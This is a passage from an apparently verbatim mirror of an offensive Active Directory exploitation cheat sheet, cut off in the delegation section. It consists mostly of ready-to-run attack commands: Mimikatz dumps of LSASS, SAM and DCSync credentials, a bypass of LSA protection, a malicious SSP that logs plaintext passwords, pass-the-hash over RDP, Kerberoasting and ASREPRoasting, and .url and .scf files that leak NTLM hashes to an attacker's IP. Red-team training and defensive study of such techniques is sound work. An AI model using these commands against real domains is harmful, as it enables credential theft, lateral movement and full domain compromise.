active-directory-cheat-sheet.md (54297B)
1 --- 2 title: "Active-Directory_cheat_sheet" 3 description: "This cheat sheet contains common enumeration and attack methods for Windows Active Directory." 4 category: active-directory 5 subcategory: "Tooling & Recon" 6 tags: ["active-directory", "adcs", "privilege-escalation", "lateral-movement"] 7 tools: ["NetExec", "Impacket", "Mimikatz", "Rubeus", "BloodHound"] 8 difficulty: intermediate 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/Active-Directory_cheat_sheet.md" 11 upstreamName: "Active Directory Exploitation Cheat Sheet" 12 upstreamUrl: "https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet" 13 upstreamAuthor: "Nikos Katsiopis & Nikos Vourdas (S1ckB0y1337)" 14 upstreamLicense: "MIT" 15 upstreamRelation: "verbatim" 16 upstreamCopyright: "Copyright (c) 2020 Nikos Katsiopis" 17 --- 18 # Active Directory Exploitation Cheat Sheet 19 20 This cheat sheet contains common enumeration and attack methods for Windows Active Directory. 21 22 ℹ️ This repository was created by [Nikos Katsiopis](https://www.linkedin.com/in/nikos-katsiopis/) and [Nikos Vourdas](https://www.linkedin.com/in/nickvourd/). 23 24 This cheat sheet is inspired by the [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) repo. 25 26  27 28 ## Summary 29 30 - [Active Directory Exploitation Cheat Sheet](#active-directory-exploitation-cheat-sheet) 31 - [Summary](#summary) 32 - [Tools](#tools) 33 - [Domain Enumeration](#domain-enumeration) 34 - [Using PowerView](#using-powerview) 35 - [Using AD Module](#using-ad-module) 36 - [Using BloodHound](#using-bloodhound) 37 - [Remote BloodHound](#remote-bloodhound) 38 - [On Site BloodHound](#on-site-bloodhound) 39 - [Using Adalanche](#using-adalanche) 40 - [Remote adalanche](#remote-adalanche) 41 - [Export Enumerated Objects](#export-enumerated-objects) 42 - [Useful Enumeration Tools](#useful-enumeration-tools) 43 - [Local Privilege Escalation](#local-privilege-escalation) 44 - [Useful Local Priv Esc Tools](#useful-local-priv-esc-tools) 45 - [Lateral Movement](#lateral-movement) 46 - [Powershell Remoting](#powershell-remoting) 47 - [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials) 48 - [Import a PowerShell Module and Execute its Functions Remotely](#import-a-powershell-module-and-execute-its-functions-remotely) 49 - [Executing Remote Stateful commands](#executing-remote-stateful-commands) 50 - [Mimikatz](#mimikatz) 51 - [Remote Desktop Protocol](#remote-desktop-protocol) 52 - [URL File Attacks](#url-file-attacks) 53 - [Useful Tools](#useful-tools) 54 - [Domain Privilege Escalation](#domain-privilege-escalation) 55 - [Kerberoast](#kerberoast) 56 - [ASREPRoast](#asreproast) 57 - [Password Spray Attack](#password-spray-attack) 58 - [Force Set SPN](#force-set-spn) 59 - [Abusing Shadow Copies](#abusing-shadow-copies) 60 - [List and Decrypt Stored Credentials using Mimikatz](#list-and-decrypt-stored-credentials-using-mimikatz) 61 - [Unconstrained Delegation](#unconstrained-delegation) 62 - [Constrained Delegation](#constrained-delegation) 63 - [Resource Based Constrained Delegation](#resource-based-constrained-delegation) 64 - [DNSAdmins Abuse](#dnsadmins-abuse) 65 - [Abusing Active Directory-Integraded DNS](#abusing-active-directory-integraded-dns) 66 - [Abusing Backup Operators Group](#abusing-backup-operators-group) 67 - [Abusing Exchange](#abusing-exchange) 68 - [Weaponizing Printer Bug](#weaponizing-printer-bug) 69 - [Abusing ACLs](#abusing-acls) 70 - [Abusing IPv6 with mitm6](#abusing-ipv6-with-mitm6) 71 - [SID History Abuse](#sid-history-abuse) 72 - [Exploiting SharePoint](#exploiting-sharepoint) 73 - [Zerologon](#zerologon) 74 - [PrintNightmare](#printnightmare) 75 - [Active Directory Certificate Services](#active-directory-certificate-services) 76 - [No PAC](#no-pac) 77 - [Domain Persistence](#domain-persistence) 78 - [Golden Ticket Attack](#golden-ticket-attack) 79 - [DCsync Attack](#dcsync-attack) 80 - [Silver Ticket Attack](#silver-ticket-attack) 81 - [Skeleton Key Attack](#skeleton-key-attack) 82 - [DSRM Abuse](#dsrm-abuse) 83 - [Custom SSP](#custom-ssp) 84 - [Cross Forest Attacks](#cross-forest-attacks) 85 - [Trust Tickets](#trust-tickets) 86 - [Abuse MSSQL Servers](#abuse-mssql-servers) 87 - [Breaking Forest Trusts](#breaking-forest-trusts) 88 89 ## Tools 90 91 - [Powersploit](https://github.com/PowerShellMafia/PowerSploit/tree/dev) 92 - [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) 93 - [Powermad](https://github.com/Kevin-Robertson/Powermad) 94 - [Impacket](https://github.com/SecureAuthCorp/impacket) 95 - [Mimikatz](https://github.com/gentilkiwi/mimikatz) 96 - [Rubeus](https://github.com/GhostPack/Rubeus) -> [Compiled Version](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries) 97 - [BloodHound](https://github.com/BloodHoundAD/BloodHound) 98 - [AD Module](https://github.com/samratashok/ADModule) 99 - [ASREPRoast](https://github.com/HarmJ0y/ASREPRoast) 100 - [Adalanche](https://github.com/lkarlslund/adalanche) 101 102 ## Domain Enumeration 103 104 ### Using PowerView 105 106 [Powerview v.3.0](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)<br> 107 [Powerview Wiki](https://powersploit.readthedocs.io/en/latest/) 108 109 - **Get Current Domain:** `Get-Domain` 110 - **Enumerate Other Domains:** `Get-Domain -Domain <DomainName>` 111 - **Get Domain SID:** `Get-DomainSID` 112 - **Get Domain Policy:** 113 114 ```powershell 115 Get-DomainPolicy 116 117 #Will show us the policy configurations of the Domain about system access or kerberos 118 Get-DomainPolicy | Select-Object -ExpandProperty SystemAccess 119 Get-DomainPolicy | Select-Object -ExpandProperty KerberosPolicy 120 ``` 121 122 - **Get Domain Controllers:** 123 ```powershell 124 Get-DomainController 125 Get-DomainController -Domain <DomainName> 126 ``` 127 - **Enumerate Domain Users:** 128 129 ```powershell 130 #Save all Domain Users to a file 131 Get-DomainUser | Out-File -FilePath .\DomainUsers.txt 132 133 #Will return specific properties of a specific user 134 Get-DomainUser -Identity [username] -Properties DisplayName, MemberOf | Format-List 135 136 #Enumerate user logged on a machine 137 Get-NetLoggedon -ComputerName <ComputerName> 138 139 #Enumerate Session Information for a machine 140 Get-NetSession -ComputerName <ComputerName> 141 142 #Enumerate domain machines of the current/specified domain where specific users are logged into 143 Find-DomainUserLocation -Domain <DomainName> | Select-Object UserName, SessionFromName 144 ``` 145 146 - **Enum Domain Computers:** 147 148 ```powershell 149 Get-DomainComputer -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName 150 151 #Enumerate Live machines 152 Get-DomainComputer -Ping -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName 153 ``` 154 155 - **Enum Groups and Group Members:** 156 157 ```powershell 158 #Save all Domain Groups to a file: 159 Get-DomainGroup | Out-File -FilePath .\DomainGroup.txt 160 161 #Return members of Specific Group (eg. Domain Admins & Enterprise Admins) 162 Get-DomainGroup -Identity '<GroupName>' | Select-Object -ExpandProperty Member 163 Get-DomainGroupMember -Identity '<GroupName>' | Select-Object MemberDistinguishedName 164 165 #Enumerate the local groups on the local (or remote) machine. Requires local admin rights on the remote machine 166 Get-NetLocalGroup | Select-Object GroupName 167 168 #Enumerates members of a specific local group on the local (or remote) machine. Also requires local admin rights on the remote machine 169 Get-NetLocalGroupMember -GroupName Administrators | Select-Object MemberName, IsGroup, IsDomain 170 171 #Return all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences 172 Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName 173 ``` 174 175 - **Enumerate Shares:** 176 177 ```powershell 178 #Enumerate Domain Shares 179 Find-DomainShare 180 181 #Enumerate Domain Shares the current user has access 182 Find-DomainShare -CheckShareAccess 183 184 #Enumerate "Interesting" Files on accessible shares 185 Find-InterestingDomainShareFile -Include *passwords* 186 ``` 187 188 - **Enum Group Policies:** 189 190 ```powershell 191 Get-DomainGPO -Properties DisplayName | Sort-Object -Property DisplayName 192 193 #Enumerate all GPOs to a specific computer 194 Get-DomainGPO -ComputerIdentity <ComputerName> -Properties DisplayName | Sort-Object -Property DisplayName 195 196 #Get users that are part of a Machine's local Admin group 197 Get-DomainGPOComputerLocalGroupMapping -ComputerName <ComputerName> 198 ``` 199 200 - **Enum OUs:** 201 ```powershell 202 Get-DomainOU -Properties Name | Sort-Object -Property Name 203 ``` 204 - **Enum ACLs:** 205 206 ```powershell 207 # Returns the ACLs associated with the specified account 208 Get-DomainObjectAcl -Identity <AccountName> -ResolveGUIDs 209 210 #Search for interesting ACEs 211 Find-InterestingDomainAcl -ResolveGUIDs 212 213 #Check the ACLs associated with a specified path (e.g smb share) 214 Get-PathAcl -Path "\\Path\Of\A\Share" 215 ``` 216 217 - **Enum Domain Trust:** 218 219 ```powershell 220 Get-DomainTrust 221 Get-DomainTrust -Domain <DomainName> 222 223 #Enumerate all trusts for the current domain and then enumerates all trusts for each domain it finds 224 Get-DomainTrustMapping 225 ``` 226 227 - **Enum Forest Trust:** 228 229 ```powershell 230 Get-ForestDomain 231 Get-ForestDomain -Forest <ForestName> 232 233 #Map the Trust of the Forest 234 Get-ForestTrust 235 Get-ForestTrust -Forest <ForestName> 236 ``` 237 238 - **User Hunting:** 239 240 ```powershell 241 #Finds all machines on the current domain where the current user has local admin access 242 Find-LocalAdminAccess -Verbose 243 244 #Find local admins on all machines of the domain 245 Find-DomainLocalGroupMember -Verbose 246 247 #Find computers were a Domain Admin OR a specified user has a session 248 Find-DomainUserLocation | Select-Object UserName, SessionFromName 249 250 #Confirming admin access 251 Test-AdminAccess 252 ``` 253 254 :heavy_exclamation_mark: **Priv Esc to Domain Admin with User Hunting:** \ 255 I have local admin access on a machine -> A Domain Admin has a session on that machine -> I steal his token and impersonate him -> Profit! 256 257 ### Using AD Module 258 259 - **Get Current Domain:** `Get-ADDomain` 260 - **Enum Other Domains:** `Get-ADDomain -Identity <Domain>` 261 - **Get Domain SID:** `Get-DomainSID` 262 - **Get Domain Controlers:** 263 264 ```powershell 265 Get-ADDomainController 266 Get-ADDomainController -Identity <DomainName> 267 ``` 268 269 - **Enumerate Domain Users:** 270 271 ```powershell 272 Get-ADUser -Filter * -Identity <user> -Properties * 273 274 #Get a specific "string" on a user's attribute 275 Get-ADUser -Filter 'Description -like "*wtver*"' -Properties Description | select Name, Description 276 ``` 277 278 - **Enum Domain Computers:** 279 ```powershell 280 Get-ADComputer -Filter * -Properties * 281 Get-ADGroup -Filter * 282 ``` 283 - **Enum Domain Trust:** 284 ```powershell 285 Get-ADTrust -Filter * 286 Get-ADTrust -Identity <DomainName> 287 ``` 288 - **Enum Forest Trust:** 289 290 ```powershell 291 Get-ADForest 292 Get-ADForest -Identity <ForestName> 293 294 #Domains of Forest Enumeration 295 (Get-ADForest).Domains 296 ``` 297 298 - **Enum Local AppLocker Effective Policy:** 299 300 ```powershell 301 Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections 302 ``` 303 304 ### Using BloodHound 305 306 #### Remote BloodHound 307 308 [Python BloodHound Repository](https://github.com/fox-it/BloodHound.py) or install it with `pip3 install bloodhound` 309 310 ```powershell 311 bloodhound-python -u <UserName> -p <Password> -ns <Domain Controller's Ip> -d <Domain> -c All 312 ``` 313 314 #### On Site BloodHound 315 316 ```powershell 317 #Using exe ingestor 318 .\SharpHound.exe --CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --domain <Domain> --domaincontroller <Domain Controller's Ip> --OutputDirectory <PathToFile> 319 320 #Using PowerShell module ingestor 321 . .\SharpHound.ps1 322 Invoke-BloodHound -CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --OutputDirectory <PathToFile> 323 ``` 324 325 ### Using Adalanche 326 327 #### Remote Adalanche 328 329 ```bash 330 # kali linux: 331 ./adalanche collect activedirectory --domain <Domain> \ 332 --username <Username@Domain> --password <Password> \ 333 --server <DC> 334 335 # Example: 336 ./adalanche collect activedirectory --domain windcorp.local \ 337 --username spoNge369@windcorp.local --password 'password123!' \ 338 --server dc.windcorp.htb 339 ## -> Terminating successfully 340 341 ## Any error?: 342 343 # LDAP Result Code 200 "Network Error": x509: certificate signed by unknown authority ? 344 345 ./adalanche collect activedirectory --domain windcorp.local \ 346 --username spoNge369@windcorp.local --password 'password123!' \ 347 --server dc.windcorp.htb --tlsmode NoTLS --port 389 348 349 # Invalid Credentials ? 350 ./adalanche collect activedirectory --domain windcorp.local \ 351 --username spoNge369@windcorp.local --password 'password123!' \ 352 --server dc.windcorp.htb --tlsmode NoTLS --port 389 \ 353 --authmode basic 354 355 # Analyze data 356 # go to web browser -> 127.0.0.1:8080 357 ./adalanche analyze 358 ``` 359 360 #### Export Enumerated Objects 361 362 You can export enumerated objects from any module/cmdlet into an XML file for later ananlysis. 363 364 The `Export-Clixml` cmdlet creates a Common Language Infrastructure (CLI) XML-based representation of an object or objects and stores it in a file. You can then use the `Import-Clixml` cmdlet to recreate the saved object based on the contents of that file. 365 366 ```powershell 367 # Export Domain users to xml file. 368 Get-DomainUser | Export-CliXml .\DomainUsers.xml 369 370 # Later, when you want to utilise them for analysis even on any other machine. 371 $DomainUsers = Import-CliXml .\DomainUsers.xml 372 373 # You can now apply any condition, filters, etc. 374 375 $DomainUsers | select name 376 377 $DomainUsers | ? {$_.name -match "User's Name"} 378 ``` 379 380 ### Useful Enumeration Tools 381 382 - [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) Information dumper via LDAP 383 - [adidnsdump](https://github.com/dirkjanm/adidnsdump) Integrated DNS dumping by any authenticated user 384 - [ACLight](https://github.com/cyberark/ACLight) Advanced Discovery of Privileged Accounts 385 - [ADRecon](https://github.com/sense-of-security/ADRecon) Detailed Active Directory Recon Tool 386 387 ## Local Privilege Escalation 388 389 - [Windows Local Privilege Escalation Cookbook](https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook) Cookbook for Windows Local Privilege Escalations 390 391 - [Juicy Potato](https://github.com/ohpe/juicy-potato) Abuse SeImpersonate or SeAssignPrimaryToken Privileges for System Impersonation 392 393 :warning: Works only until Windows Server 2016 and Windows 10 until patch 1803 394 395 - [Lovely Potato](https://github.com/TsukiCTF/Lovely-Potato) Automated Juicy Potato 396 397 :warning: Works only until Windows Server 2016 and Windows 10 until patch 1803 398 399 - [PrintSpoofer](https://github.com/itm4n/PrintSpoofer) Exploit the PrinterBug for System Impersonation 400 401 :pray: Works for Windows Server 2019 and Windows 10 402 403 - [RoguePotato](https://github.com/antonioCoco/RoguePotato) Upgraded Juicy Potato 404 405 :pray: Works for Windows Server 2019 and Windows 10 406 407 - [Abusing Token Privileges](https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/) 408 - [SMBGhost CVE-2020-0796](https://blog.zecops.com/vulnerabilities/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/) \ 409 [PoC](https://github.com/danigargu/CVE-2020-0796) 410 - [CVE-2021-36934 (HiveNightmare/SeriousSAM)](https://github.com/cube0x0/CVE-2021-36934) 411 412 ### Useful Local Priv Esc Tools 413 414 - [PowerUp](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Privesc/PowerUp.ps1) Misconfiguration Abuse 415 - [BeRoot](https://github.com/AlessandroZ/BeRoot) General Priv Esc Enumeration Tool 416 - [Privesc](https://github.com/enjoiz/Privesc) General Priv Esc Enumeration Tool 417 - [FullPowers](https://github.com/itm4n/FullPowers) Restore A Service Account's Privileges 418 419 ## Lateral Movement 420 421 ### PowerShell Remoting 422 423 ```powershell 424 #Enable PowerShell Remoting on current Machine (Needs Admin Access) 425 Enable-PSRemoting 426 427 #Entering or Starting a new PSSession (Needs Admin Access) 428 $sess = New-PSSession -ComputerName <Name> 429 Enter-PSSession -ComputerName <Name> OR -Sessions <SessionName> 430 ``` 431 432 ### Remote Code Execution with PS Credentials 433 434 ```powershell 435 $SecPassword = ConvertTo-SecureString '<Wtver>' -AsPlainText -Force 436 $Cred = New-Object System.Management.Automation.PSCredential('htb.local\<WtverUser>', $SecPassword) 437 Invoke-Command -ComputerName <WtverMachine> -Credential $Cred -ScriptBlock {whoami} 438 ``` 439 440 ### Import a PowerShell Module and Execute its Functions Remotely 441 442 ```powershell 443 #Execute the command and start a session 444 Invoke-Command -Credential $cred -ComputerName <NameOfComputer> -FilePath c:\FilePath\file.ps1 -Session $sess 445 446 #Interact with the session 447 Enter-PSSession -Session $sess 448 449 ``` 450 451 ### Executing Remote Stateful commands 452 453 ```powershell 454 #Create a new session 455 $sess = New-PSSession -ComputerName <NameOfComputer> 456 457 #Execute command on the session 458 Invoke-Command -Session $sess -ScriptBlock {$ps = Get-Process} 459 460 #Check the result of the command to confirm we have an interactive session 461 Invoke-Command -Session $sess -ScriptBlock {$ps} 462 ``` 463 464 ### Mimikatz 465 466 ```powershell 467 #The commands are in cobalt strike format! 468 469 #Dump LSASS: 470 mimikatz privilege::debug 471 mimikatz token::elevate 472 mimikatz sekurlsa::logonpasswords 473 474 #(Over) Pass The Hash 475 mimikatz privilege::debug 476 mimikatz sekurlsa::pth /user:<UserName> /ntlm:<> /domain:<DomainFQDN> 477 478 #List all available kerberos tickets in memory 479 mimikatz sekurlsa::tickets 480 481 #Dump local Terminal Services credentials 482 mimikatz sekurlsa::tspkg 483 484 #Dump and save LSASS in a file 485 mimikatz sekurlsa::minidump c:\temp\lsass.dmp 486 487 #List cached MasterKeys 488 mimikatz sekurlsa::dpapi 489 490 #List local Kerberos AES Keys 491 mimikatz sekurlsa::ekeys 492 493 #Dump SAM Database 494 mimikatz lsadump::sam 495 496 #Dump SECRETS Database 497 mimikatz lsadump::secrets 498 499 #Inject and dump the Domain Controler's Credentials 500 mimikatz privilege::debug 501 mimikatz token::elevate 502 mimikatz lsadump::lsa /inject 503 504 #Dump the Domain's Credentials without touching DC's LSASS and also remotely 505 mimikatz lsadump::dcsync /domain:<DomainFQDN> /all 506 507 #Dump old passwords and NTLM hashes of a user 508 mimikatz lsadump::dcsync /user:<DomainFQDN>\<user> /history 509 510 #List and Dump local kerberos credentials 511 mimikatz kerberos::list /dump 512 513 #Pass The Ticket 514 mimikatz kerberos::ptt <PathToKirbiFile> 515 516 #List TS/RDP sessions 517 mimikatz ts::sessions 518 519 #List Vault credentials 520 mimikatz vault::list 521 ``` 522 523 :exclamation: What if mimikatz fails to dump credentials because of LSA Protection controls ? 524 525 - LSA as a Protected Process (Kernel Land Bypass) 526 527 ```powershell 528 #Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1 529 reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa 530 531 #Next upload the mimidriver.sys from the official mimikatz repo to same folder of your mimikatz.exe 532 #Now lets import the mimidriver.sys to the system 533 mimikatz # !+ 534 535 #Now lets remove the protection flags from lsass.exe process 536 mimikatz # !processprotect /process:lsass.exe /remove 537 538 #Finally run the logonpasswords function to dump lsass 539 mimikatz # sekurlsa::logonpasswords 540 ``` 541 542 - LSA as a Protected Process (Userland "Fileless" Bypass) 543 544 - [PPLdump](https://github.com/itm4n/PPLdump) 545 - [Bypassing LSA Protection in Userland](https://blog.scrt.ch/2021/04/22/bypassing-lsa-protection-in-userland) 546 547 - LSA is running as virtualized process (LSAISO) by Credential Guard 548 549 ```powershell 550 #Check if a process called lsaiso.exe exists on the running processes 551 tasklist |findstr lsaiso 552 553 #If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data. 554 #Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides 555 mimikatz # misc::memssp 556 557 #Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log 558 ``` 559 560 - [Detailed Mimikatz Guide](https://adsecurity.org/?page_id=1821) 561 - [Poking Around With 2 lsass Protection Options](https://medium.com/red-teaming-with-a-blue-team-mentaility/poking-around-with-2-lsass-protection-options-880590a72b1a) 562 563 ### Remote Desktop Protocol 564 565 If the host we want to lateral move to has "RestrictedAdmin" enabled, we can pass the hash using the RDP protocol and get an interactive session without the plaintext password. 566 567 - Mimikatz: 568 569 ```powershell 570 #We execute pass-the-hash using mimikatz and spawn an instance of mstsc.exe with the "/restrictedadmin" flag 571 privilege::debug 572 sekurlsa::pth /user:<Username> /domain:<DomainName> /ntlm:<NTLMHash> /run:"mstsc.exe /restrictedadmin" 573 574 #Then just click ok on the RDP dialogue and enjoy an interactive session as the user we impersonated 575 ``` 576 577 - xFreeRDP: 578 579 ```powershell 580 xfreerdp +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore /bpp:8 /u:<Username> /pth:<NTLMHash> /v:<Hostname | IPAddress> 581 ``` 582 583 :exclamation: If Restricted Admin mode is disabled on the remote machine we can connect on the host using another tool/protocol like psexec or winrm and enable it by creating the following registry key and setting it's value zero: "HKLM:\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin". 584 585 - Bypass "Single Session per User" Restriction 586 587 On a domain computer, if you have command execution as the system or local administrator and want an RDP session that another user is already using, you can get around the single session restriction by adding the following registry key: 588 ```powershell 589 REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 590 ``` 591 592 Once you've completed the desired stuff, you can delete the key to reinstate the single-session-per-user restriction. 593 ```powershell 594 REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUse 595 ``` 596 597 598 ### URL File Attacks 599 600 - .url file 601 602 ``` 603 [InternetShortcut] 604 URL=whatever 605 WorkingDirectory=whatever 606 IconFile=\\<AttackersIp>\%USERNAME%.icon 607 IconIndex=1 608 ``` 609 610 ``` 611 [InternetShortcut] 612 URL=file://<AttackersIp>/leak/leak.html 613 ``` 614 615 - .scf file 616 617 ``` 618 [Shell] 619 Command=2 620 IconFile=\\<AttackersIp>\Share\test.ico 621 [Taskbar] 622 Command=ToggleDesktop 623 ``` 624 625 Putting these files in a writeable share the victim only has to open the file explorer and navigate to the share. **Note** that the file doesn't need to be opened or the user to interact with it, but it must be on the top of the file system or just visible in the windows explorer window in order to be rendered. Use responder to capture the hashes. 626 627 :exclamation: .scf file attacks won't work on the latest versions of Windows. 628 629 ### Useful Tools 630 631 - [Powercat](https://github.com/besimorhino/powercat) netcat written in powershell, and provides tunneling, relay and portforward 632 capabilities. 633 - [SCShell](https://github.com/Mr-Un1k0d3r/SCShell) fileless lateral movement tool that relies on ChangeServiceConfigA to run command 634 - [Evil-Winrm](https://github.com/Hackplayers/evil-winrm) the ultimate WinRM shell for hacking/pentesting 635 - [RunasCs](https://github.com/antonioCoco/RunasCs) Csharp and open version of windows builtin runas.exe 636 - [ntlm_theft](https://github.com/Greenwolf/ntlm_theft.git) creates all possible file formats for url file attacks 637 638 ## Domain Privilege Escalation 639 640 ### Kerberoast 641 642 _WUT IS DIS?:_ \ 643 All standard domain users can request a copy of all service accounts along with their correlating password hashes, so we can ask a TGS for any SPN that is bound to a "user" 644 account, extract the encrypted blob that was encrypted using the user's password and bruteforce it offline. 645 646 - PowerView: 647 648 ```powershell 649 #Get User Accounts that are used as Service Accounts 650 Get-NetUser -SPN 651 652 #Get every available SPN account, request a TGS and dump its hash 653 Invoke-Kerberoast 654 655 #Requesting the TGS for a single account: 656 Request-SPNTicket 657 658 #Export all tickets using Mimikatz 659 Invoke-Mimikatz -Command '"kerberos::list /export"' 660 ``` 661 662 - AD Module: 663 664 ```powershell 665 #Get User Accounts that are used as Service Accounts 666 Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName 667 ``` 668 669 - Impacket: 670 671 ```powershell 672 python GetUserSPNs.py <DomainName>/<DomainUser>:<Password> -outputfile <FileName> 673 ``` 674 675 - Rubeus: 676 677 ```powershell 678 #Kerberoasting and outputing on a file with a specific format 679 Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> 680 681 #Kerberoasting whle being "OPSEC" safe, essentially while not try to roast AES enabled accounts 682 Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /rc4opsec 683 684 #Kerberoast AES enabled accounts 685 Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /aes 686 687 #Kerberoast specific user account 688 Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /user:<username> /simple 689 690 #Kerberoast by specifying the authentication credentials 691 Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /creduser:<username> /credpassword:<password> 692 ``` 693 694 ### ASREPRoast 695 696 _WUT IS DIS?:_ \ 697 If a domain user account do not require kerberos preauthentication, we can request a valid TGT for this account without even having domain credentials, extract the encrypted 698 blob and bruteforce it offline. 699 700 - PowerView: `Get-DomainUser -PreauthNotRequired -Verbose` 701 - AD Module: `Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth` 702 703 Forcefully Disable Kerberos Preauth on an account i have Write Permissions or more! 704 Check for interesting permissions on accounts: 705 706 **Hint:** We add a filter e.g. RDPUsers to get "User Accounts" not Machine Accounts, because Machine Account hashes are not crackable! 707 708 PowerView: 709 710 ```powershell 711 Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"} 712 Disable Kerberos Preauth: 713 Set-DomainObject -Identity <UserAccount> -XOR @{useraccountcontrol=4194304} -Verbose 714 Check if the value changed: 715 Get-DomainUser -PreauthNotRequired -Verbose 716 ``` 717 718 - And finally execute the attack using the [ASREPRoast](https://github.com/HarmJ0y/ASREPRoast) tool. 719 720 ```powershell 721 #Get a specific Accounts hash: 722 Get-ASREPHash -UserName <UserName> -Verbose 723 724 #Get any ASREPRoastable Users hashes: 725 Invoke-ASREPRoast -Verbose 726 ``` 727 728 - Using Rubeus: 729 730 ```powershell 731 #Trying the attack for all domain users 732 Rubeus.exe asreproast /format:<hashcat|john> /domain:<DomainName> /outfile:<filename> 733 734 #ASREPRoast specific user 735 Rubeus.exe asreproast /user:<username> /format:<hashcat|john> /domain:<DomainName> /outfile:<filename> 736 737 #ASREPRoast users of a specific OU (Organization Unit) 738 Rubeus.exe asreproast /ou:<OUName> /format:<hashcat|john> /domain:<DomainName> /outfile:<filename> 739 ``` 740 741 - Using Impacket: 742 743 ```powershell 744 #Trying the attack for the specified users on the file 745 python GetNPUsers.py <domain_name>/ -usersfile <users_file> -outputfile <FileName> 746 ``` 747 748 ### Password Spray Attack 749 750 If we have harvest some passwords by compromising a user account, we can use this method to try and exploit password reuse 751 on other domain accounts. 752 753 **Tools:** 754 755 - [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) 756 - [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) 757 - [Invoke-CleverSpray](https://github.com/wavestone-cdt/Invoke-CleverSpray) 758 - [Spray](https://github.com/Greenwolf/Spray) 759 760 ### Force Set SPN 761 762 _WUT IS DIS ?: 763 If we have enough permissions -> GenericAll/GenericWrite we can set a SPN on a target account, request a TGS, then grab its blob and bruteforce it._ 764 765 - PowerView: 766 767 ```powershell 768 #Check for interesting permissions on accounts: 769 Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"} 770 771 #Check if current user has already an SPN setted: 772 Get-DomainUser -Identity <UserName> | select serviceprincipalname 773 774 #Force set the SPN on the account: 775 Set-DomainObject <UserName> -Set @{serviceprincipalname='ops/whatever1'} 776 ``` 777 778 - AD Module: 779 780 ```powershell 781 #Check if current user has already an SPN setted 782 Get-ADUser -Identity <UserName> -Properties ServicePrincipalName | select ServicePrincipalName 783 784 #Force set the SPN on the account: 785 Set-ADUser -Identiny <UserName> -ServicePrincipalNames @{Add='ops/whatever1'} 786 ``` 787 788 Finally use any tool from before to grab the hash and kerberoast it! 789 790 ### Abusing Shadow Copies 791 792 If you have local administrator access on a machine try to list shadow copies, it's an easy way for Domain Escalation. 793 794 ```powershell 795 #List shadow copies using vssadmin (Needs Admnistrator Access) 796 vssadmin list shadows 797 798 #List shadow copies using diskshadow 799 diskshadow list shadows all 800 801 #Make a symlink to the shadow copy and access it 802 mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\ 803 ``` 804 805 1. You can dump the backuped SAM database and harvest credentials. 806 2. Look for DPAPI stored creds and decrypt them. 807 3. Access backuped sensitive files. 808 809 ### List and Decrypt Stored Credentials using Mimikatz 810 811 Usually encrypted credentials are stored in: 812 813 - `%appdata%\Microsoft\Credentials` 814 - `%localappdata%\Microsoft\Credentials` 815 816 ```powershell 817 #By using the cred function of mimikatz we can enumerate the cred object and get information about it: 818 dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>" 819 820 #From the previous command we are interested to the "guidMasterKey" parameter, that tells us which masterkey was used to encrypt the credential 821 #Lets enumerate the Master Key: 822 dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>" 823 824 #Now if we are on the context of the user (or system) that the credential belogs to, we can use the /rpc flag to pass the decryption of the masterkey to the domain controler: 825 dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>" /rpc 826 827 #We now have the masterkey in our local cache: 828 dpapi::cache 829 830 #Finally we can decrypt the credential using the cached masterkey: 831 dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>" 832 ``` 833 834 Detailed Article: 835 [DPAPI all the things](https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials) 836 837 ### Unconstrained Delegation 838 839 _WUT IS DIS ?: If we have Administrative access on a machine that has Unconstrained Delegation enabled, we can wait for a 840 high value target or DA to connect to it, steal his TGT then ptt and impersonate 